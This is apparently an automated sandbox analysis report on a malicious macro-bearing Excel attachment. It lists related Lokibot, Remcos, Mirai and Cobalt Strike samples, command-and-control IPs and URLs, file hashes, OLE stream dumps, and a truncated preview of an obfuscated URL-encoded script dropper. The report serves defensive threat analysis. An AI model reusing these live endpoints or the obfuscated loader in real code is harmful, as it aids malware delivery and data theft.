	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/logs/five/fre.php
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220/skipo/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	192.210.215.8
	#PO247762.docx	Get hash	malicious	Remcos	Browse	104.168.7.51
	la.bot.arm7.elf	Get hash	malicious	Unknown	Browse	192.3.165.37
	la.bot.m68k.elf	Get hash	malicious	Unknown	Browse	107.175.231.193
	Logs.xls	Get hash	malicious	Lokibot	Browse	192.3.176.141
	PRODUCT_INQUIRY.js	Get hash	malicious	WSHRat	Browse	192.210.215.11
	Inv No.248740.xls	Get hash	malicious	Unknown	Browse	107.175.229.138
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	172.245.123.45
	seethebestthingstobegetmebackwithherlove.hta	Get hash	malicious	Cobalt Strike	Browse	23.94.171.157
	necgoodthingswithgreatthingsentirethingstobeinonline.hta	Get hash	malicious	Cobalt Strike	Browse	107.173.4.9
TLN-ASDE	zDAH4anUtC.elf	Get hash	malicious	Unknown	Browse	5.159.88.227
	x86.elf	Get hash	malicious	Unknown	Browse	5.159.88.221
	arm7.elf	Get hash	malicious	Mirai	Browse	5.159.88.226
	hR6s75mYfS.elf	Get hash	malicious	Mirai	Browse	5.159.88.234
	sora.x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.221
	zMtlCW3JE2.exe	Get hash	malicious	Unknown	Browse	5.159.57.195
	x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.220
	TV9gyhWdj9.elf	Get hash	malicious	Mirai	Browse	5.159.88.230
	gWG8IWTQvp.elf	Get hash	malicious	Mirai	Browse	5.159.88.202
	fU0e51cFa3	Get hash	malicious	Mirai	Browse	5.159.88.207
TLN-ASDE	zDAH4anUtC.elf	Get hash	malicious	Unknown	Browse	5.159.88.227
	x86.elf	Get hash	malicious	Unknown	Browse	5.159.88.221
	arm7.elf	Get hash	malicious	Mirai	Browse	5.159.88.226
	hR6s75mYfS.elf	Get hash	malicious	Mirai	Browse	5.159.88.234
	sora.x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.221
	zMtlCW3JE2.exe	Get hash	malicious	Unknown	Browse	5.159.57.195
	x86.elf	Get hash	malicious	Mirai	Browse	5.159.88.220
	TV9gyhWdj9.elf	Get hash	malicious	Mirai	Browse	5.159.88.230
	gWG8IWTQvp.elf	Get hash	malicious	Mirai	Browse	5.159.88.202
	fU0e51cFa3	Get hash	malicious	Mirai	Browse	5.159.88.207
NET1-ASBG	Logs.xls	Get hash	malicious	Lokibot	Browse	94.156.177.220
	SOA October 24_1.doc	Get hash	malicious	Lokibot	Browse	94.156.177.220
	17296631442c81ba7f9716fbc1aab98d3cbe332f196a0c4ba623a6879e4902adfc5aa38233992.dat-decoded.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	hZ6ZMDS1rc.exe	Get hash	malicious	AsyncRAT	Browse	93.123.39.76
	New Order.exe	Get hash	malicious	Lokibot	Browse	94.156.177.220
	boatnet.arm7.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.spc.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.m68k.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.ppc.elf	Get hash	malicious	Mirai	Browse	93.123.85.38
	boatnet.mips.elf	Get hash	malicious	Mirai	Browse	93.123.85.38

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
05af1f5ca1b87cc9cc9b25185115607d	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	#PO247762.docx	Get hash	malicious	Remcos	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	PO NAHK22012FA00000.docx.doc	Get hash	malicious	Remcos	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	Logs.xls	Get hash	malicious	Lokibot	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	CLOSURE.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	oodforme.doc	Get hash	malicious	Remcos	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	EX0096959.docx.doc	Get hash	malicious	Remcos	Browse	142.250.186.142 216.58.212.174 142.250.186.97
	SGS-Report0201024.xla.xlsx	Get hash	malicious	FormBook	Browse	142.250.186.142 216.58.212.174 142.250.186.97
7dcce5b76c8b17472d024758970a406b	A & C Metrology OC 5457144.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	#PO247762.docx	Get hash	malicious	Remcos	Browse	5.159.62.244 5.159.62.243
	PO NAHK22012FA000000.docx	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	PO NAHK22012FA00000.docx.doc	Get hash	malicious	Remcos	Browse	5.159.62.244 5.159.62.243
	Logs.xls	Get hash	malicious	Lokibot	Browse	5.159.62.244 5.159.62.243
	Inv No.248740.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	InvoiceXCopy.xls	Get hash	malicious	Snake Keylogger	Browse	5.159.62.244 5.159.62.243
	EX0096959.docx.doc	Get hash	malicious	Remcos	Browse	5.159.62.244 5.159.62.243
	Inv No.248730.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243
	Oct2024TU-580.xls	Get hash	malicious	Unknown	Browse	5.159.62.244 5.159.62.243

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	4742
Entropy (8bit):	4.8105940880640246
Encrypted:	false
SSDEEP:	96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
MD5:	278C40A9A3B321CA9147FFBC6BE3A8A8
SHA1:	D795FC7D3249F9D924DC951DA1DB900D02496D73
SHA-256:	4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
SHA-512:	E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
Category:	modified
Size (bytes):	133636
Entropy (8bit):	2.5269830459558813
Encrypted:	false
SSDEEP:	96:Eam7QSo4DH5wo4DH5rtTRJP4srvjTKP4DH5Sr4DH5NFAb5UAf4DH5G7T:Ea2Rok0RLknYoVT
MD5:	0B1AA8AE190D05DF71F4052FAE67DF5B
SHA1:	F6FE29F3E7830B15E3B244BA83216C029DCB60FB
SHA-256:	4E15EAB180712F99EFE5EEA760BEEA458C7BFC4EEB5F5961B2B5D0C9B7611D3D
SHA-512:	94008A8BF00A1334C16129258243BF89D8351C82EDE845FEFDB657838FE2F602F761B9935E5FEF5E01B368096993F49A48E65D3705CEA948D9435DB0DF370A04
Malicious:	true
Preview:	<script>.. ..document.write(unescape("%3Cscript%20language%3DJavaScript%3Em%3D%27%253Cscript%2520language%253DJavaScript%253Em%253D%2527%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRiPT%252520TYpE%25253D%252522TexT/vBscrIpt%252522%25253E%25250ADiM%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.820207680412466
Encrypted:	false
SSDEEP:	24:etGSXPBG5eM7p8mqBk+lTzz3tkZfV46qhkWI+ycuZhNtakS7PNnq:6QsM+mAXKJVXEH1ulta3xq
MD5:	D38194577D9309BB5A0F573F737A6DFF
SHA1:	B69E5216B799FBD41F66955C51B34CBAA8EC176E
SHA-256:	EB7B7B2B9E7F1A7593A991F3B3BA53AAC053BE41304CE24E7DB889B17CBE65F4
SHA-512:	EED8A9D778BD79E6A48CA3E12544537EC17E41224FB6992213D1CA2A462BC90DED92F63C50CDF628B7ECBE068196B27B3732CB8004F57708EDECD48CEB622E36
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....s.....s.......................................... >.....P ......P.........V.....^.....e.....h.....q...P.....P...!.P.....P.......!............>.......................................'..........<Module>.41

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 01:50:20 2024, Security: 1
Entropy (8bit):	7.576785073850612
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Shipping Documents WMLREF115900.xls
File size:	100'864 bytes
MD5:	98502d8342f1afd8b699b26ff777a919
SHA1:	0d0c6a6f90611fee9c232d90fca0776dbbff5241
SHA256:	40bcfababa169393524d58a9447ea465ac7a18edd09ae9eaea2739c8d77dab9d
SHA512:	0d1e03166c7dc08098acaeace97930fdc7bfa5b50932bbb6ee151691202389f1d7d053c2d0b0a6248ecfa7a6056bd16a0ad2a61e91a6f03d292d7ace1d5e7e86
SSDEEP:	1536:MiqHy1S6F8b2SQrEkawpoXIow7yLHXXRD6G10u9QvuTUpx2MjeHmfDI7:UeFHrE2sIoeK3XR2GWumv6UprT
TLSH:	AEA3F12933D6C802D4869B719EDAC0DB8A51FC96AD65CB5B32C0F31E24BD6C2D94374B
File Content Preview:	........................>...................................N...................q..............................................................................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:	WORMS
Last Saved By:	91974
Create Time:	2013-09-08T10:39:32Z
Last Saved Time:	2024-10-22T13:14:21Z
Creating Application:	Microsoft Excel
Security:	0

Document Code Page:	1252
Thumbnail Scaling Desired:	false
Company:	MAHIEDDINE
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 81 20 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < q e . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 71 65 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < z D . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 7a 44 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 ee 3c 1a f6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2403503175049813
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . H % . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBd0002400B/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBd0002400B/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	38341
Entropy:	7.85773182578822
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBd0002400C/\x1Ole
CLSID:
File Type:	data
Stream Size:	612
Entropy:	4.971262337053294
Base64 Encoded:	False
Data ASCII:	. . . . @ U > d L $ . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . m . p . a . . . l . i . / . u . i . k . l . D . r . ? . & . c . o . l . l . o . q . u . i . a . = . w . i . s . t . f . u . l . & . s . t . a . d . i . u . m . = . t . a . n . g . y . & . e . a . r . t . h . q . u . a . k . e . = . f . e . i . g . n . e . d . & . o . f . f . i . c . i . a . l . = . q . u . i . z . z . i . c . a . l . & . d . i . s . p . l . a . y . = . f . e . a . r . l . e . s . s . & . t .
Data Raw:	01 00 00 02 db 40 ab 55 3e 64 4c 24 00 00 00 00 00 00 00 00 00 00 00 00 aa 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a6 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6d 00 70 00 61 00 2e 00 6c 00 69 00 2f 00 75 00 69 00 6b 00 6c 00 44 00 72 00 3f 00 26 00 63 00 6f 00 6c 00 6c 00 6f 00 71 00 75 00 69 00 61 00 3d 00 77 00 69 00 73 00 74 00 66 00 75 00 6c 00

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	47149
Entropy:	7.9740179597932555
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . d . . . 3 v . ) 8 b R , 4 X l B ' 1 . # . . j . = 5 C . . . . . . . 2 . . . \\ . p . T m 8 P . j U m . N ) . . , . 9 . ~ = O . ! ; ' v ` [ q e # , . . Q . p \| @ Y . . i . . P . G Z . d B . . . . a . . . ^ . . . = . . . . . . . . i 2 @ . o K . . . . . * . . . . . . _ . . . . h . . . . . . . g . . . , Z = . . . . . m Y g c G 1 N ~ . - @ . . . j . . . . a " . . . Z . . . . u . . . . . . D 1 . . . 8 C ] * P 5 . . . . 3 m Q 1 . . . . ; X . . $ . 3 i . . M
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 a7 64 d9 89 2e e5 0b 84 b6 e5 33 76 97 8f 11 ed 96 29 e1 38 62 52 2c 34 58 6c b1 89 42 27 31 e7 8e ed 0a 23 a1 8d 10 c4 ad 6a 03 3d d8 35 43 98 e1 00 02 00 b0 04 c1 00 02 00 32 d9 e2 00 00 00 5c 00 70 00 b7 54 b4 6d e6 97 dc f0 38 50 84 11 6a a5 55 e2 b2 fb 6d 0c 4e 9c 29 ab a7 b8 96 14 1b eb

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	529
Entropy:	5.270033320300745
Base64 Encoded:	True
Data ASCII:	I D = " { 4 8 C A B 2 3 3 - A F B 3 - 4 E E F - B 9 7 D - 7 C 5 F 2 D 8 D 7 6 8 4 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 7 2 5 0 B 9 2 0 D 9 6 D 4 9 A D
Data Raw:	49 44 3d 22 7b 34 38 43 41 42 32 33 33 2d 41 46 42 33 2d 34 45 45 46 2d 42 39 37 44 2d 37 43 35 46 32 44 38 44 37 36 38 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping Documents WMLREF115900.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

